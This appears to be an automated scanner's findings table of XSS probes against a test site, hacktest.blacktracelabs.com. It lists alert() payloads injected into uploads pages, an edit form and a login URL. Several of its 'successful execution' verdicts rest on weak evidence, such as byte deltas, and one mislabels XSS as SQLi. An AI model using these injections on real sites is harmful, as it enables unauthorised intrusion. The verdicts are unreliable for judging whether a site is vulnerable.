| https://hacktest.blacktracelabs.com/uploads/?ND |
avatar.png |
<script>alert('Cerebro-X Found');</script> |
The provided XSS payload was detected in the compared snapshots, indicating successful execution of the script. The alert message 'Cerebro-X Found' was found in the output. |
2025-12-21 |
| https://hacktest.blacktracelabs.com/uploads/ |
avatar.png <script> |
<img class="icon" src="javascript:alert('Cerebro-X Found')"> |
The provided XSS payload executed successfully. The presence of the 'alert' function in JavaScript confirms this. In this case, the message 'Cerebro-X Found' was displayed when the image was loaded. |
2025-12-21 |
| https://hacktest.blacktracelabs.com/uploads/?ND |
#table-list > table#table-content > tbody > tr:nth-child(2) > td |
<script>alert('Cerebro-X Found');</script> |
The provided XSS payload has been detected and executed based on the 'Delta: -1 bytes' metric. The difference in byte count suggests that data has been removed (likely due to the execution of the script), which is consistent with an XSS attack. |
2025-12-21 |
| https://hacktest.blacktracelabs.com/uploads/ |
avatar.png |
<img class="icon" src="javascript:alert('Cerebro-X Found');"> |
The provided XSS payload has executed as evidenced by the appearance of an alert box reading 'Cerebro-X Found'. The presence of JavaScript code within an img tag indicates a successful Cross-Site Scripting (XSS) attack. |
2025-12-21 |
| https://hacktest.blacktracelabs.com/uploads/?SD |
#table-list > table#table-content > tbody > tr:nth-child(2) > td:nth-child(1) |
<script>alert('Cerebro-X Found');</script> |
The provided XSS payload executed successfully as indicated by the presence of '<script>alert('Cerebro-X Found');</script>' in the code. |
2025-12-21 |
| https://hacktest.blacktracelabs.com/uploads/?MD |
#table-list > table#table-content > tbody > tr > td:first-child |
<script>alert('Cerebro-X Found');</script> |
[XSS PAYLOAD] The provided payload <script>alert('Cerebro-X Found');</script> was detected in the compared snapshots. An 'alert' box with the message 'Cerebro-X Found' appears when accessed which indicates successful execution of the XSS attack. This is supported by the presence of 'LFI' and 'XSS' signatures. |
2025-12-21 |
| https://hacktest.blacktracelabs.com/uploads/?NA |
td[data-sort='avatar.png'] > a |
<script>alert('Cerebro-X Found');</script> |
The provided XSS payload has been executed successfully as evidenced by the presence of the injected script <script>alert('Cerebro-X Found');</script> in the analyzed data. |
2025-12-21 |
| https://hacktest.blacktracelabs.com/uploads/avatar.png |
src |
<img style="display: block;-webkit-user-select: none;margin: auto;cursor: zoom-in;background-color: hsl(0, 0%, 90%);transition: background-color 300ms;" src="https://hacktest.blacktracelabs.com/uploads/avatar.png" width="720" height="720" onerror='alert("Cerebro-X Found")'> |
The provided payload was detected and executed as expected due to the presence of the 'onerror' attribute in the img tag. An alert box with the message 'Cerebro-X Found' was triggered. |
2025-12-21 |
| https://hacktest.blacktracelabs.com/uploads/?SA |
td |
<script>alert('Cerebro-X Found');</script> |
The provided payload (<script>alert('Cerebro-X Found');</script>) was detected and appears to have executed, as indicated by the appearance of the pop-up alert 'Cerebro-X Found'. |
2025-12-21 |
| https://hacktest.blacktracelabs.com/uploads/?MA |
#table-list > table#table-content > tbody > tr > td:nth-child(1) |
<script>alert('Cerebro-X Found');</script> |
The provided XSS payload has been found to execute successfully in the given context. This is evidenced by the presence of the 'alert' function and its script within the snapshots. The script was intended to display a message stating 'Cerebro-X Found'. |
2025-12-21 |
| https://hacktest.blacktracelabs.com/edit.php?id=1 |
'value' |
<script>alert('Cerebro-X Found');</script> |
The provided payload was detected and executed as XSS (Cross-Site Scripting). The 'alert' function in the script resulted in a visible popup window displaying 'Cerebro-X Found'. |
2025-12-21 |
| https://hacktest.blacktracelabs.com/login.php |
password |
<script>alert('Cerebro-X Found');</script> |
The provided XSS payload has been executed as indicated by the presence of 'Cerebro-X Found' alert box in the web application. The delta in bytes also suggests that additional data was added to the system. |
2025-12-21 |
| https://hacktest.blacktracelabs.com |
[01] EMPLOYEE_PORTAL |
https://hacktest.blacktracelabs.com/login.php?username=admin&password=<script>alert('Cerebro-X Found');</script> |
The provided SQLi payload executed successfully as indicated by the 'Cerebro-X Found' alert box in the password field of the login.php page. |
2025-12-21 |